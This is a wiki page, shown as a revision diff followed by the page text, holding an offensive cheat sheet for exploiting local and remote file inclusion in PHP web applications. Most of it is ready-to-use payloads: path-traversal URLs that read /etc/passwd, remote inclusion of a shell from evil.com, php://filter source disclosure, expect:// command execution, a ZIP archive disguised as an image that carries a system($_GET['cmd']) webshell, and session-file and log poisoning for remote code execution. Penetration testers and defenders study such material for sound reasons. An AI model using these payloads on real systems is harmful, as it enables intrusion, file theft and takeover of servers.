Difference between revisions of "Exploiting Local/Remove File Inclusion"

(LFI / RCE via PHP Session)
Line 1: Line 1:
= What is LFI / RFI? =
 
Local/Remove File Inclusion vulnerability allows an attacker to exploit a dynamic file inclusion mechanism of a web application to access files outside the intended spectre.
 
 
= What is LFI / RFI? =
 
= What is LFI / RFI? =
 
Local/Remove File Inclusion vulnerability allows an attacker to exploit a dynamic file inclusion mechanism of a web application to access files outside the intended spectre.
 
Local/Remove File Inclusion vulnerability allows an attacker to exploit a dynamic file inclusion mechanism of a web application to access files outside the intended spectre.
Line 26: Line 24:
 
</syntaxhighlight>
 
</syntaxhighlight>
  
== LFI Wrapper with ZIP ==
+
== Exploit LFI through ZIP ==
 
Crate a PHP payload (e.g.: system($_GET['cmd']), zip, masking your archive as a file with different, acceptable extension
 
Crate a PHP payload (e.g.: system($_GET['cmd']), zip, masking your archive as a file with different, acceptable extension
 
<syntaxhighlight lang="bash" line>
 
<syntaxhighlight lang="bash" line>
Line 39: Line 37:
 
</syntaxhighlight>
 
</syntaxhighlight>
  
== LFI / RCE via input:// ==
+
== Exploit LFI / RCE via input:// ==
 
<syntaxhighlight lang="bash">
 
<syntaxhighlight lang="bash">
 
http://example.com/index.php?page=php://input
 
http://example.com/index.php?page=php://input
Line 45: Line 43:
 
</syntaxhighlight>
 
</syntaxhighlight>
  
== LFI / RCE via PHP Session ==
+
== Exploit LFI / RCE via PHP Session ==
 
Check if the website use PHP Session (PHPSESSID)
 
Check if the website use PHP Session (PHPSESSID)
  
Line 65: Line 63:
 
</syntaxhighlight>
 
</syntaxhighlight>
  
== LFI / RCE via Log file ==
+
== Exploit LFI / RCE via Log file ==
 
Append PHP to a log file
 
Append PHP to a log file
 
<syntaxhighlight lang="bash">
 
<syntaxhighlight lang="bash">

Revision as of 15:16, 26 April 2018

What is LFI / RFI?

Local/Remove File Inclusion vulnerability allows an attacker to exploit a dynamic file inclusion mechanism of a web application to access files outside the intended spectre.

LFI / RFI Cheat Sheet

http://example.com/index.php?page=../../../etc/passwd
http://example.com/index.php?page=../../../etc/passwd%00
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls
http://example.com/index.php?page=path/to/uploaded/file.png
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+

Exploit LFI through ZIP

Crate a PHP payload (e.g.: system($_GET['cmd']), zip, masking your archive as a file with different, acceptable extension

zip payload.zip payload.php;   
mv payload.zip shell.jpg;    
rm payload.php

Execute

http://example.com/index.php?page=zip://shell.jpg%23payload.php

Exploit LFI / RCE via input://

http://example.com/index.php?page=php://input
DATA: <? system('whoami'); ?>

Exploit LFI / RCE via PHP Session

Check if the website use PHP Session (PHPSESSID)

Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-April-2018 00:21:29 EDT; path=/; httponly

In PHP5 these sessions are stored into /var/lib/php5/sess_[PHPSESSID]

Inject your command into a cookie:

login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php

And include it

http://example.com/index.php?page=file=/../../../../../../../../../var/lib/php5/sess_978a69sdf76987er6zdfa

Exploit LFI / RCE via Log file

Append PHP to a log file

http://example.com/index.php?page=/var/log/apache/access.log
http://example.com/index.php?page=/var/log/apache/error.log
http://example.com/index.php?page=/var/log/vsftpd.log
http://example.com/index.php?page=/var/log/sshd.log

And include it

http://example.com/index.php?page=/var/log/apache/access.log